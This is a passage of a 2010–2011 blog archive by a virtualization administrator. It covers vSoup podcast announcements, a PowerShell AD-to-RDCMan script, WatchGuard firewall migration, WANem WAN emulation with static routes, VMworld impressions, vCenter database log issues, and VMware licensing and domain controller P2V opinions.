dormant passion in each and every isolated vInfrastructure Admin in the world. The combined hive-mind is awesome, and you are all a significant part of it. ** --- # vSoup Episode #4 now available URL: https://vNinja.net/news/vsoup-episode-4-now-available/ Date: 2011-02-10 Author: christian Tags: Podcast, vSoup The fourth edition (Big Fat Pipes with Bob) of the vSoup podcast is now available. This time we had the honor of having Bob Plankers as a guest. Bob runs The Lone Sysadmin, where his recent post “Blame” really resonated well with me personally. The fact of the matter is that in many cases Bob is right, virtualization admins ends up being blamed for everything. No matter who’s fault it actually is, though, I’m the one-stop shop now for blame. How very, very true. --- # vSoup Episode #3 now available URL: https://vNinja.net/news/vsoup-episode-3-now-available/ Date: 2011-01-24 Author: christian Tags: Podcast, vSoup The third episode of vSoup has been spotted in the wild. Head on over to vSoup.net to grab it while it’s still warm. Or, you can frantically refresh your iTunes feed until it pops up there. Either way, it’s alive! --- # Remote Desktop Connection Manager (RDCMan) + Powershell = Win URL: https://vNinja.net/howto/remote-desktop-connection-manager-rdcman-powershell-win/ Date: 2011-01-20 Author: christian Tags: Ops, Powershell, RDCMan, Windows Remote Desktop Connection Manager is a great tool from Microsoft which enables you to keep track of all your RDP sessions and targets in a nice GUI. One of the things it’s lacking though, is some sort of Active Directory connection that allows you to import all your server objects directly, and not manually add/remove the serves as your infrastructure changes over time. In an attempt to bridge that gap, I’ve made a very small PowerShell script that queries your Active Directory for server objects and dumps their names into a text file that you can import into RDCMan. This is a very simple solution, but works great in my environment. GetAllServers.ps1 # Import-Module ActiveDirectory $servers = Get-ADComputer -LDAPFilter "(operatingsystem=*Windows Server*)" | select name,dnshostname $Date = Get-Date $filename = "Servers-{0}{1:d2}{2:d2}" -f $date.year,$date.month,$date.day foreach ($server in $servers) { $servername = $server.name #Customize this for your environment $servername | Out-File -append -encoding ASCII <path>\$filename.txt } In short, replace the path in line 11, and you should be able to run the script. It will then create a file called servers-{current-date}.txt in the path you have specified. This is a simple text file with one server defined on each line. This file can then be imported into RDCMan by going to the Edit menu and select Import Servers. This brings up the Import Servers dialog box where you can browse to the file that the PowerShell script created. Click on the Import Button and all your servers should now be listed in RDCMan. The next time you need to update, delete the existing servers, re-run the PowerShell script and import again. While this isn’t a fully automated solution, and I really wish RDCMan could do this for you by querying AD directly and finding new servers and removing the ones that are no longer present and so on, it is a quick way to get your current servers into RDCMan without manually creating each and every entry. Update: # After I initially posted this, Jan Egil Ring, pointed me to his solution which is a bit more elaborate. Have a look at his solution “Dynamic Remote Desktop Connection Manager connection list”, which is how it really should be done… --- # Powershell: Scripting Best Practices Analyzer remotely URL: https://vNinja.net/windows/powershell-scripting-best-practices-analyzer-remotely/ Date: 2011-01-18 Author: christian Tags: Ops, Powershell, Remoting Jan Egil Ring over at blog.powershell.no has created a great PowerShell script that lets you run the Microsoft Best Practices Analyzer on remote Windows Server 2008 R2 machines. In short, Invoke-BPAModeling.ps1 queries your Active Directory for any machines that run Windows Server 2008 R2, runs BPA on them (if Windows PowerShell Remoting is enabled) and emails you the report. Great tool that should be in every Windows Server admins tool-belt, and probably also set as a scheduled job to make sure you stay up to date on your servers status. --- # vSoup Episode #2 now available URL: https://vNinja.net/news/vsoup-episode-2-now-available/ Date: 2011-01-17 Author: christian Tags: Podcast, vSoup The second episode of vSoup is now available. Head on over to vSoup.net to get your fix. Chris, Ed and myself keeps rambling about, this time about blogger recruitment, high availability, security and the HP Proliant MicroServer. Enjoy! --- # Volume Activation Management Tool (VAMT) article URL: https://vNinja.net/news/volume-activation-management-tool-vamt-article/ Date: 2011-01-16 Author: christian Tags: Licensing, Microsoft, Ops, Petri I’ve had another article posted on Petri IT Knowledgebase! The Volume Activation Management Tool (VAMT) is a free tool from Microsoft that can help administrators perform licensing and activation related tasks from a single viewpoint. VAMT is currently available in version 2.0, and supports the following products and operating systems: Read the rest of the article called License & Activation Management with Volume Activation Management Tool (VAMT) on petri.co.il --- # Migrating from Watchguard Firebox X to XTM Series Firewalls URL: https://vNinja.net/network/migrating-from-watchguard-firebox-x-to-xtm-series-firewalls/ Date: 2011-01-07 Author: christian Tags: firewall, Ops, watchguard Watchguard has recently retired their X series of firewalls and replaced them with their new lineup of XTM boxes. I took this opportunity to replace my X series firewalls with some from the new lineup, and found a neat way to migrate your existing configuration from old to new in a few very easy steps. Note: Normally I would not recommend migrating your configuration in this manner. In my mind you should always rebuild rules when replacing your firewall, as it is the perfect time to review and do some QA. Migrating your existing config # I used a laptop do do the actual configuration, to make sure that I didn’t get any conflicts in my production environment when setting up the new one with an old config. By default the Watchguard firewalls come with DHCP enabled on eth1 (trusted) and blindly plugging that into your existing infrastructure might not be the best of ideas. Also, remember that the config also includes the firewall IP adress and what happens if you have two firewalls with identical IP adresses in your network? Lets just agree that it’s not a pretty sight. Step-by-Step Guide # Save your current (old) configuration from your live production firewall Install latest version of Watchguard System Manager Activate new firewall and retrieve feature key from watchguard.com Disconnect laptop from existing production environment, and connect it directly to new XTM firewall on eth1 (trusted) Run through Quick Setup Wizard on new XTM firewall Open new config xml file in a suited editor. I used Notepad++ Find the lines that reads x700 (your model might differ) Replace x700 with XTM820 (again, your model might differ) and save config file with new name Connect Watchguard System Manager to new firewall and start Policy Manager Open freshly edited config file and save to firebox (if prompted to convert config file to new format, do so) Add new feature key Save to Firebox And there it is. All existing configuration migrated from old Watchguard X series firewall migrated to a new and shiny XTM series. You should now be able to do a quick switch between new and old firewalls and all your services should be available immediately. If not, you can always just revert to the old firewall and troubleshoot the new one. --- # So, what is this vSoup thing? URL: https://vNinja.net/news/so-what-is-this-vsoup-thing/ Date: 2011-01-04 Author: christian Tags: Podcast, vSoup Some times things just happen, and before you know it you’re sitting in your in-laws living room talking to an Englishman and an American via Skype. And to top it of; it’s all being recorded. And to make matters even worse, we decided to try and make it a regular thing. The recordings that is, not the “in your in-laws living room” thing, that was a one-off for sure. What I’m trying to say here is that yours truly, Ed Czerwin and Chris Dearden has decided that we want to be rock-stars and start our own little virtualization related podcast. The first episode of vSoup is now available, head on over to vSoup.net to check it out, and remember, we are all virgins here. Be gentle. --- # State of the vNinja: 2010 URL: https://vNinja.net/news/state-of-the-vninja-2010/ Date: 2010-12-30 Author: christian Tags: Is 2010 over already? I guess it’s true that time flies when your having fun! 2010 has been a great year for me, both personally and professionally. I won’t bore you to death with personal issues, but as far as professionally goes you’ll just have to bare with me. 2010 was the year I really feel that I got a lot of good work done, and some of that are really significant changes for my organization which is in a way better state IT wise now than in 2009. I can’t take credit for all that on my own, I have some very competent coworkers that are equally to blame/praise for the work we have been able to do in 2010. By the looks of it, 2011 will be even better! One major thing stands out when I think of what happened the last 12 months. VMworld Europe 2010. It still amazes me how important VMworld feels, even 4 months later. I met some amazing people face to face, finally, and that alone was worth the trip. You know who you are! I had one, albeit pretty minor, public speaking job in 2010 where I did a walk-trough of my companies disaster recovery setup, based on, amongst other things, VMware vSphere and Veeam Backup and Recovery. I haven’t done any of that in a while, and it was real fun being asked to do it again. Hopefully there will be more opportunities to do more of the same, and by the looks of it I might even do a similar, but much bigger, gig again in the beginning of February 2011. More details to come. I have set a lot of personal goals for 2011, and I won’t be listing them all here as some of them are pretty personal. But I do have a plan for finally getting my VCP4 sorted, and possibly also a VCAP-DCA if my employer gives the go-ahead. I have been neglecting these certifications for way to long now. I do promise to keep posting on vNinja, and I really promise to finish off a series of posts when I start publishing them! Sadly I didn’t manage to get all my stuff sorted before the end of the year, but hopefully I’ll be able to finish the series I’ve started on pretty early in 2011. vNinja saw a total of 32 posts in 2010, the first one in late July. This equates to about 5 posts a month, something I look to increase on in 2011. The visitor numbers have been amazingly good, and I hope to keep building on that as well. And who knows, you might just hear more from me in 2011 than ever before. How do you like your bowl of vSoup? While I can promise to meet all my goals for 2011, I can promise one thing: There will be no seppuku in 2011, neither physical nor virtual. I’m here for the long haul, like it or not. Have a good new year everyone, I’m honored to have you as my readers and I’ll work hard to keep it that way throughout 2011 as well. --- # Installing and Configuring WANem Virtual Appliance URL: https://vNinja.net/virtualization/installing-and-configuring-wanem-virtual-appliance/ Date: 2010-12-29 Author: christian Tags: Free Tools, HowTo, Networking, Ops, Simulation, vCenter, Virtual Appliance, VMware In a previous post, Using the WANem WAN Emulator Virtual Appliance, I’ve talked about how I’ve successfully used WANem to emulate different WAN scenarios. Since I work for a shipping company, the ability to emulate VSAT conditions are especially useful for testing and proof-of-concept scenarios. You can use WANem a couple of different ways but my setup is pretty simple but does the job perfectly. Downloading WANem # I have chose to use the WANem Virtual Appliance running in a virtual machine hosted by VMware Workstation. If you don’t have Workstation handy, VMware Player will also do the job. You don’t need to use the virtual appliance, as WANem also offers a bootable ISO download that you could boot your VM from Starting and configuring WANem # First off, extract the WANemv2.1.zip file, and place the virtual machine files in a know location. My choice is _c:\virtual machines_ but you will have to adjust that for your specific environment. Secondly, fire up VMware Workstation and chose the “Open existing VM or Team” option In the file dialog box browse to where you extracted the virtual machine files and select “Open” I like to run the WANem VM in bridge mode, since this gives the VM it’s own IP address from my DHCP server. This comes in handy later when we setup what traffic we want to route through WANem. By default the VM is configured in “Bridge Mode” which is the network mode we want, so go ahead and start the VM by pressing the “Power on this virtual machine” option. The WANem VM starts to boot up, but it stops asking if you want to configure all network interfaces via DHCP. As I use DHCP in my network, I don’t have to specify any network information so I hit ‘y’ to let it continue booting. Once again the boot process stops, this time asking you to specify a root password for the VM. Provide your own password twice, and the boot process is finished. Don’t worry about the password strength, or even if you remember it later. The VM boots on a pre-configured Knoppix LiveCD, and the next time you start it it will ask for a new password. If you don’t see the IP address that WANem has received from your DHCP server, type status and hit enter, and it will show you the IP it has been assigned. Open your favorite browser, and point it to http://WANemIP/WANem (in my case this was http://192.168.5.90/WANem) And there it is, WANem is up and running. We’ll leave it as is for the time being, and start routing traffic through it as is. Running IP traffic trough WANem # You have a couple of choices when it comes to routing your traffic through WANem. The easiest setup si where you set WANem as your default gateway and route all traffic through it. Remember though that this only comes into play if your destination is on another subnet than the one you are currently connected to. In many scenarios this isn’t desirable, and I prefer to route specific traffic through WANem and not have to play around with my DHCP assigned settings. What I usually do, is to drop into cmd in administrator mode, and issue the following command: route add {destination IP} mask 255.255.255.255 {WANem IP} This routes all traffic from the computer I run the command on, through the WANem IP address, and from there on it goes to it’s original destination. This allows it to work on local subnet traffic, as well as remote traffic, and it will not affect any other IP traffic from that computer to the rest of the network. Obviously, we need a destination as well. For this lab setup I decided to route the traffic to my local printer through WANem. It’s ip is 192.168.5.12, so the command to run inside cmd as administrator is: route add 192.168.5.12 mask 255.255.255.255 192.168.5.90 Now, all traffic from my local computer to my printer is routed through WANem. For now, nothing much happens. WANem receives the data on it’s network card, and promptly sends it on it’s merry way to the final destination; my printer. No innocent packets have been mauled or otherwise hurt in the process, at least not so far. If you want to route everything even local subnet traffic through WANem, enter the following command: route add 0.0.0.0 mask 0.0.0.0 {WANem IP} Tweaking WANem settings # Finally, the fun part! Now we can start playing around with those innocent little network packets that flow through the network. Ever wanted to know what happens if you try to print to a printer over a 128kb WAN link? Well, now you can! I would strongly advise against trying to print your über 120 slide PowerPoint presentation at this point, but you can if you want to. Possibly. I’m not going to try to print over the link as it is now, we’ll have to settle for a little demonstration using much simpler means. Tool of choice the ever faithfull ping. Basically I’ll demonstrate how WANem fiddles with your network traffic. First off, a just a normal ping of my printer with no edits done by WANem what so ever: As you can see, as this is on my local network, the response time is great at 1ms and no dropped packets. Now we can open the WANem web interface, and start messing about. Click on “Advanced Mode” and then on the “Start” button to bring up the web interface. The next screen brings up a lot of options, and we’re going to tweak a couple of them. I set the “Delay Time (ms)” to 200ms and the “Loss %” to 25%, and hit “Apply Settings”. When we turn back to our cmd window, we should see instant results in our ping monitor. As you can see, the response time is now approximately 200ms and the packet loss is about 25%, in accordance with the settings I’ve applied. Of course, as you can see, there are lots of other settings to play around with as well. WANem also allows you to save your settings, so if you find your own perfect little real world emulation scenario you can export the settings and re-apply them later if you wish. Cleaning house # When testing is over, be sure to remove your static route(s) again. If you don’t, and you power down your WANem appliance you simply will not be able to reach your destination(s) until it’s powered on again. Thankfully, removing the static routes are as easy as adding them in the first place. The command to run, in an administrative mode cmd is: route delete {destination IP} Conclusion # WANem is a very nice, and simple to set up, little appliance that could make it much easier planning deployments and emulating real world scenarios. After all, do you know how your applications behave if they get high latency connections? Or if you get jitter problems or even dropped packets? Give it a test, you might just get a bit surprised at the results you get. --- # vNinja used by VMware URL: https://vNinja.net/news/vninja-used-by-vmware/ Date: 2010-12-27 Author: christian Tags: Documentation, Presentation, Virtualization, VMware Thanks to Maish Saidel-Keesing, vExpert 2010 and blogger over at Technodrone I have been made aware that VMware has used one of my posts here on vNinja in their internal presentation material. The material in question is vSphere 4.1 to 4.0 differences (page 44 and 45 in vSphere 4.1 Deep Dive - Part 1 - v6.pptx), where my post about Using USB Pass-through in vSphere 4.1 is quoted and my screenshots used. I guess no-one else had tested USB passthrough in vSphere 4.1 with USB based UPS setups before I did. While I think this is great, and I’m really honored that my content here can be used as internal VMware resources, I must say that I would have loved to be notified, and asked, by Iwan Rahabok when he created the material. Iwan did provide links and source attribution in his presentation, but a direct message from him would have been great as well. --- # Virtual Admins - Virtual Pirates? URL: https://vNinja.net/virtualization/virtual-admins-virtual-pirates/ Date: 2010-12-23 Author: christian Tags: Maintenance, realworld, Virtualization, VMware When Rich Brambley posted “A Pirate Invented Server Virtualization” today, it reminded me of a little story from my own production environment. This story is a couple of years old, but sadly it’s still valid. A very specialized application that we run, requires a SQL Server Express instance, a proxy/licensing server and client installation with license files to work. This application isn’t very advanced, nor very resource intensive so by nature it’s prime for running in a virtualized environment. None of the application developers customers had ever attempted setting it up in a virtualized environment, and so we offered to be a pilot customer and test it live in our environment. The testing confirmed what we thought, it worked perfectly when virtualized! We were happy, and so were the developers. At least, that’s what we thought. In fact, what happened next is one of the more bizarre fall outs I’ve personally seen when it comes to implementing a “virtualize first” strategy. When we got the final version of the software, out of the testing phase, I got about my business of installing and configuring it. All was fine, until I got to the part where I was supposed to install the proxy/licensing service. It turns out that the application developers had put checks in place to prevent installation on virtual machines! After we tested and verified the solution in our environment, the developer turned around and blocked us from implementing it as we wished. In fact, we still run this service on one of the few physical servers we still have in place in our data center. If it were up to me, I would have kicked the application right out of our environment, but sadly core parts of our business relies on this application and we are stuck with it. The developers reasoning for doing this was that it was way to easy to duplicate the proxy/licensing service in a virtual environment, and by doing that we could potentially bypass the concurrent user license model they had put in place. Their checks are based on a hardware id generated by the physical hardware thus it could potentially be the same if we duplicated the VMs. They could of course work around that, by using the server DNS name as one of the hardware id checks or even the NIC MAC address, but sadly they opted to completely block the installation and operation of that particular part of their infrastructure if you run virtualized. Bad call? Very much so, and I have made this very clear to them to no avail. So, perhaps Dilbert is right? Was virtualization indeed created by pirates? I would rather be a Ninja than a Pirate any day. --- # Developer meets PowerCLI - awesomeness ensues URL: https://vNinja.net/virtualization/developer-meets-powercli-awesomeness-ensues/ Date: 2010-10-15 Author: christian Tags: Ops, PowerCLI, PowerGui, Powershell, vCenter, Virtualization, VMware, vSphere A couple of days ago, while I was at VMworld Europe I got the following tweet from Asbjørn A. Mikkelsen (@neslekkim) (translated from norwegian): @h0bbel Do you know if I can script something against vCenter to duplicate (or create from template) VMs, and also start/stop them? My immediate response, was of course to suggest using PowerCLI. Asbjørn, who works as a full time developer, jumped at PowerCLI immediately and within a very short time frame came up with a PowerCLI script for the task at hand. You can download the script and play around with it, if you want. Inline documentation is in Norwegian, and if Asbjørn had intended to redistribute the script I’m sure he would have optimized it more than the current revision. The point here isn’t the implementation itself, but rather the fact that he was able to put this automation routine together very quickly, and completely without prior knowledge to PowerCLI at all. I do feel bad for not pointing him to PowerGUI and the VI Toolkit PowerPack before he sat down and crafted this in Notepad though. I’m sure he cursed me silently as soon as I pointed them out to him, as that combination makes this kind of automation so much easier. --- # VMworld.next - a couple of suggestions URL: https://vNinja.net/virtualization/vmworld-next-a-couple-of-suggestions/ Date: 2010-10-15 Author: christian Tags: Virtualization, VMware, vmworld Now that the VMworld events are over for 2010, I’m still trying to digest a lot of the impressions I’ve had over the past few days. However, I do have a couple of suggestions I would like to voice: Add contact information to the attendee badge! Just like David Owen (@vMackem) suggested, adding Twitter ID and blog link to the attendee badge would make it easier to keep track of everyone you meet up with. I would even take it a a step further, and actually add a QR code with the contact info in it directly to the badge. That way, we could all run around and scan each other! (Not as dirty as it might sound!). No more need for business card exchanges, business cards you eventually lose anyway. Lab availability at the event I’ve mentioned that I want the labs extended to year round online availability in all it’s cloudiness, but how about giving attendees the possibility to run the labs from their own computers while at VMworld? Thanks for that idea, gcballard! --- # VMworld Europe 2010 – The aftermath URL: https://vNinja.net/virtualization/vmworld-europe-2010the-aftermath/ Date: 2010-10-15 Author: christian Tags: conference, VMware, vmworld I’m back home again, after spending the better part of this week in Copenhagen, attending VMworld Europe 2010. Let me just say, straight off the bat, that attending VMworld is probably the best idea I’ve had in years. In reality, that’s not saying much, but the value of attending is immense. The way VMworld is organized, with lots of simultaneous sessions, labs and other activities is both a challenge and a blessing. It’s a challenge in the sense that you need to plan your schedule pretty well and really take control over your own experience. The blessing is that you’re not locked into a predetermined path, and you can re-arrange your schedule at any time if you wish to do so. And trust me, you’ll plan one thing and probably end up doing something completely different in the end. A lot of my time was spent in the Social Media and Blogger lounge that VMware and John Troyers social media team kindly had set up. It was amazing to finally meet some of the people I’ve been interacting with for years, without ever meeting them in person. To paraphrase Bas Raayman “The average IQ drops 20 points every time I enter the lounge”. I don’t think Bas is right, not in his case anyway, but actually being able to discuss cloud and lab availability with John Arrasjid and stretched cluster scenarios with Scott Lowe and Lars Trøen is just amazing. Now, this wasn’t supposed to be a name-dropping post, but in essence the value of VMworld is what you make it out to be. You can be in sessions all day long, or you can split your time between the sessions and labs. In fact, you can even skip all the sessions since they all will be available online in a week or so after the conference. For me, the biggest value was the social networking part of it all. My current mantra of “The network is everything”, I might just have to change that into “your social network is everything” now. In fact, the slogan “Virtual Roads. Actual Clouds.” could probably be changed “Virtual Systems. Actual People.” Now, I just need some time to digest it all and it will be very interesting to see what opportunities might arise from it all. Remember, it’s all in the (social) network. --- # Extending VMworld Labs URL: https://vNinja.net/virtualization/extending-vmworld-labs/ Date: 2010-10-13 Author: christian Tags: Undoubtedly one of the most popular “features” of VMworld 2010, both in the US and in EU, are the labs. These hands-on exercises in configuring and using various VMware products lets you play around without the need for lab equipment or licenses installed locally. What if VMware extended this to not only run during the VMworld conferences? Let us get our hands dirty all year round! It’s hard to have a full lab setup in the office, and if we could book time in the VMware Cloud Lane to play around with VMware vCloud™, VMware vCenter™ Site Recovery Manager or even VMware ThinApp™ that would be great! I’m sure VMware can see the value in providing their customers and partners with hands-on labs for training purposes, as well as being a great showcase for their core “cloud” services as enterprise ready. While I’m not suggesting they give everyone and their mother lab access 24/7/365, VMware should indeed offer a way for customers and partners to book time and play around. After all, VMware want us to buy their products and their vision for the cloud, don’t they? --- # VMworld Europe 2010 Contest Over URL: https://vNinja.net/virtualization/vmworld-europe-2010-contest-over/ Date: 2010-10-12 Author: christian Tags: They found me! Well, not they, but Duco Jaspars (@vConsult) found me straight after the keynote and was promptly handed the Trainsignal VMware vSphere Pro Series Training Vol. 2. training kit. Duco Jaspars (@vConsult) # Gerben Kloosterman has posted some pictures of the handover as well. --- # VMworld Europe 2010 Pictures URL: https://vNinja.net/news/vmworld-europe-2010-pictures/ Date: 2010-10-12 Author: christian Tags: View slideshow with larger photos --- # VMworld Europe 2010 URL: https://vNinja.net/virtualization/vmworld-europe-2010/ Date: 2010-10-10 Author: christian Tags: contest, fun, vmworld VMworld Europe 2010 is close. Very close. In fact, lots of people are already in place in Copenhagen, personally I don’t get until tomorrow evening (the 11th). Since I get in pretty late, I really hope I’ll be able to get to my hotel quickly, and then find Custom House for the Tweetup/VMUG Party. Remember I have a little contest going, where you can win a copy of Trainsignal VMware vSphere Pro Series Training Vol. 2. In case you are wondering how to find me, well I’m not really sure how you should go about doing that. Use your imagination! If you do need some help locating me, check my twitter stream and/or Foursquare and here is a recent picture as well. Good luck! Photographic proof that the prize exists # --- # vCenter 4.1 Database Recovery Model Defaults URL: https://vNinja.net/virtualization/vcenter-4-1-database-recovery-model-defaults/ Date: 2010-10-04 Author: christian Tags: Backup, Maintenance, Ops, SQL Server Express, vCenter, vSphere Sometimes leaving the defaults in place might just come back and bite you, hard. That might also be the case with your vCenter 4.1 database, as I experienced back in July. All of a sudden my vCenter Server stopped working. The symptoms where pretty obvious, my client couldn’t connect to the vCenter server. Naturally I connected to the server, and noticed that the VMware VirtualCenter Server services had indeed stopped. No wonder the client couldn’t connect to it. I tried starting it, but if would shut itself down again after a few seconds. The next step, obviously, was to look at the event logs and there it was, in plain English explaining the service desire to stop: Log Name: Application Source: MSSQL$SQLEXP_VIM Date: 17.07.2010 02:06:16 Event ID: 9002 Task Category: (2) Level: Error Keywords: Classic User: SYSTEM Computer: [removed] Description: The transaction log for database 'VIM_VCDB' is full. To find out why space in the log cannot be reused, see the log_reuse_wait_desc column in sys.databases Important bit: The transaction log for database ‘VIM_VCDB’ is full. To find out why space in the log cannot be reused, see the log_reuse_wait_desc column in sys.databases As it turns out, the transaction log for my SQL Server Express based vCenter install database was indeed full. Not only was it full, it had grown to eat just about each and every byte out of the disk space on the server. I got around this by changing the recovery model back to simple, and performing a new backup via the script I’ve mentioned earlier: Scheduling vCenter Backups. I’m not saying this is how you should configure your own vCenter recovery model, you need to chose one that fits your specific backup scheme. Just make sure you understand how the different settings affect your particular environment. So, where does the defaults come into play? As VMware explains in KB Article 1001046 : SQL Server Recovery Model Affects Transaction Log Disk Space Requirements the install defaults to the Bulk Recovery model. This model allows the transaction log to grow, until a backup clears it and lets it start over. If you, like me, used a scripted backup that doesn’t do transaction log pruning you might very well be in the same predicament pretty soon. So, take my advice, make sure you understand the backup routines you have in place for your vCenter and check those log settings before your vCenter stops unexpectedly. Do yourself a favour, check your log files and do it now. Of course, this is not the only thing that has an effect on your vCenter Database size. The settings for vCenter Server Statistics also comes into play, but in my case the issue was the backup scheme I had in place and the default settings for a new vCenter 4.1 install. --- # Going to VMworld Europe 2010 Contest: Where is Christian? URL: https://vNinja.net/virtualization/going-to-vmworld-europe-2010-contest-where-is-christian/ Date: 2010-09-24 Author: christian Tags: vmworld fun contest Today I finally got word that I will indeed be going to VMworld Europe 2010 in Copenhagen! I’ve done the registration process, so all that remains is to book the flight and hotel and I’m ready to go. To celebrate this, I’ve decided to announce a little contest; Where is Christian aka h0bbel? # The first person to find me, as in the physical me, in the Bella Center during VMworld Europe 2010, (I’ll be there Tuesday - Thursday) will receive a free copy of the Trainsignal VMware vSphere Pro Series Training Vol. 2 training package. No strings attached. All you have to do is find me and say “Hi”. :-) See you all there, and no I won’t be wearing a red and white striped sweater and a beanie. I think. --- # VMware vSphere Hypervisor Licensing and Cost URL: https://vNinja.net/virtualization/vmware-vsphere-hypervisor-licensing-and-cost/ Date: 2010-09-22 Author: christian Tags: Ops, vCenter, Virtualization, VMware We all know, and love, the fact that vSphere Hypervisor is free of charge. The free version doesn’t come with all the bells and whistles of the fully licensed product, but it’s still very usable in many scenarios. Recently I’ve been investigating the possibilities of running vSphere Hypervisor on a number of floating branch offices, also known as vessels. I’m not going into details about the proposed setup, and how we intend to roll it and so on, but one of the things I really wanted to get out of this was to have all my off-site vSphere Hypervisor installs appear in my vCenter Client. I don’t need HA, DRS, DPM or any of the other licensed features and I’d be happy with running the free edition if only it was able to connect to an existing vCenter installation. Sadly, and understandably, this isn’t possible in the free edition so I looked into what it would cost to license the installs to make this a possibility. After investigating a bit, it seems that I would need to buy VMware vSphere Standard licenses for all the vessels to be able to get what I want. For 20 vessels, with the standard pricing available on vmware.com, inclusive 1 year support, we come up with this (all prices in USD) Hosts vSphere Standard License Cost incl. Support Total Cost 20 1318 26360 In effect, this means that I would need to pay $26360.- USD to be able to get my vSphere Hypervisor hosts connected to my existing vCenter. That simply isn’t feasible in the current situation. Remember, I do not need any of the other features that vSphere Standard provides me with, like Thin Provisioning, High Availability, vMotion, vStorage APIs for Data Protection and Update Manager. Update Manager could potentially be useful, but that’s about it. So, dear VMware; Have you considered this scenario at all? I’m sure I’m not the only customer looking to deploy vSphere Hypervisor in remote locations, where they will run a single VM and their poor admin wants to be able to have them all managed in a single console? I would really like to see a “vCenter Connector” license for vSphere Hypervisor, that only provides a way to connect to an existing licensed vCenter instance. Is this to much to ask for? I understand that VMware want to get paid for their enterprise products, and I’m normally happy to do so, but in this case the return simply does not warrant the cost. --- # P2V a Domain Controller? Why would you? URL: https://vNinja.net/virtualization/p2v-a-domain-controller-why-would-you/ Date: 2010-09-21 Author: christian Tags: Maintenance, Ops, Virtualization Some topics seem to pop up at random intervals, one of them being virtualizing Microsoft Active Directory Domain Controller servers. The question is often either “Should I virtualize my Domain Controllers, and if so should I virtualize all of them?” or “Should I do a P2V (Physical 2 Virtual) conversion of my existing Domain Controllers, or create new ones?” In this post, I’ll be talking about the second question. While there is a lot to be said about the first one as well, I’ll leave that for future post. Most businesses have an existing Active Directory when they decide to virtualize. There might be different reasons for going virtual with regards to Active Directory, but in my mind there are close to no scenarios where I would even consider doing a P2V conversion of an Domain Controller. The reasons for this are plenty: You need to do a cold conversion You absolutely should not do a hot P2V migration of a DC. If you try to hot migration, you will end up with a domain controller that is out of sync with the others, lots of issues and a really painful headache Never power on the old server The old server, the one you did a cold P2V migration of, must never be powered back on after the new virtual instance is started. If it gets powered back on, you will once again be in a world of hurt. Potential Cleanup problems You need to clean up the old driver stack (most P2V tools will do this for you), and you might end up with for instance two network cards that share the same IP, one of them hidden from view and not very easily removed. This could in turn make the DNS services on a converted domain controller does bind to the wrong network interface. And we all know what happens to Active Directory if DNS doesn’t work right. I’m sure there are many other potential issues as well, like Kerberos authentication or trust failures and so on. This is not a situation you want to end up in, especially not in your production environment. Gabrie van Zanten recently published a recipe for P2V migrations of existing Domain Controllers, called Virtualizing a domain controller, how hard can it be? and I’m confident that this method would probably work out fine. My question is this; Why would you want to do this in the first place? It’s not like it’s hard to set up a new Domain Controller, make sure it replicates properly with the existing physical or virtual ones, transfer any FSMO roles the soon-to-be-decommissioned Domain Controller has to the new instance and then safely and timely remove Active Directory from the old server. Of course, Gabe has a point when he mentions that the issues you might get with a botched P2V of a Domain Controller would be the same as old style bad management like using Symantec Ghost on a DC and roll back to an old image if something fails, but why risk it at all? Deploying a new Windows Server 2008 R2 VM, running dcpromo and setting up DNS does not take a long time, nor is it very complex to do. I have not timed this, but I seriously doubt that creating a cold P2V migration boot device, shutting down the physical server, booting the cold migration tool, do the actual P2V conversion and powering on the new VM takes less time than it takes to set up a new VM. You might argue that you will have to install anti-virus and backup agents and possibly other tools to the new VM as well, but if your infrastructure is somewhat reasonably set up with automation tools etc. this should not really be a factor to consider. Besides, if you do it this way you have a return path, after all you haven’t removed anything! In fact, I’m pretty sure this whole post took longer to write than it would take to actually set up a new Domain Controller in my production environment. My conclusion is, don’t bother risking a P2V of a Domain Controller. Set up a new VM instead, it’s easy, quick and risk free. In other words, as the vSensei would say “just because you can, no mean you should” So Gabe, as far as this one goes; You’re on your own! ;-) --- # Redesigning the vCenter Client? URL: https://vNinja.net/virtualization/redesigning-the-vcenter-client/ Date: 2010-09-20 Author: christian Tags: Ops, vCenter, Virtualization, VMware, vSphere In fresh blog post, called “Resource pools and simultaneous vMotions” by Frank Denneman prompted a quick Twitter discussion regarding the vCenter client (and perhaps even vCenter itself). A simple Why are there no folders under Host and Clusters view ? from Maish Saidel-Keesing got the ball rolling. Could it be that the design of the client itself helps perpetuate the myth the resource pools is an organizational unit, one that should be used as a way of grouping VMs? As Frank says; This is not (the) reason why VMware invented resource pools. I’m not going to get into why this is a bad idea, both Frank and Duncan will have far more intelligent feedback to you if you are interested in discussing this. Now, if you could redesign the vSphere Client, based on your own experience, what would you change? I can see that in many cases, a lightweight vCenter Simple Mode client would do the trick. Give your VM admins the Simple Mode client, and they won’t have to worry about resource pools, HA/DRS and other advanced features. Let them administer the VMs, like adding networking, powering on/off etc. The same applies for your storage admins. Give them a small, limited, client that only allows them to configure storage aspects. I know you can do most of this with permissions etc, but I still feel a limited client could be one way to go. In other cases, like mine, it won’t help splitting up the client into smaller chunks. As in most SMBs, I wear a lot of different hats during a normal working day. I’m the networking-/storage-/operating-systems-guy in a small shop, where there simply isn’t room for delegating all these tasks to specialized teams or even other admins. Perhaps dividing the client into specialized sub-topics would help? A task based user experience where you can select between “VM Operations”, “vSphere Operations”, “Storage Operations” or “Network Operations” as your initial choice, and then limit what you can configure based on your initial choice would help organize the screen real estate? You could also have sub-sections like “Monitoring VMs”, “Monitoring Storage” and so on, displaying a performance overview as the initial point of entry. You could still have an “Advanced Mode” that works the same way the vCenter Client works today, but the default would be a simplified experience that is based on the task you have at hand. Am I completely out on a limb here, or is this semi-rant making some sense, somewhere? What would you change, and how? --- # HP ProLiant MicroServer - Not Quite There Yet? URL: https://vNinja.net/news/hp-proliant-microserver-not-quite-there-yet/ Date: 2010-09-09 Author: christian Tags: When HP announced their new ProLiant MicroServer, I really hoped that it would be the perfect answer to a specific use case I’ve been looking at lately. Basically, what I’m looking for is a small chassis, low noise branch office server that would be used to host a single virtual machine, offering Read-Only Domain Controller (RODC) and Distributed File System (DFS) file-shares. Initially it looked to fit the bill perfectly: Small footprint; Check Low Noise levels; Check But, sadly, that’s where it stops. The first version of the HP ProLiant MicroServer comes with one CPU offering, namely theAMD Athlon II NEO N36L which isn’t all that much to run even a single-VM ESXi instance on. The current tech spec page does not go into much details about the storage controller, other than it’s an “Integrated 4 port SATA RAID Storage Controller”, which makes it impossible to check for compatibility on the official VMware HCL. The 1GbE NC107i NIC supplied with the server, seems to be supported by VMware though, at least according to the ProLiant option VMware support matrix. I understand that HP created this server for a different use-case than the one I’m 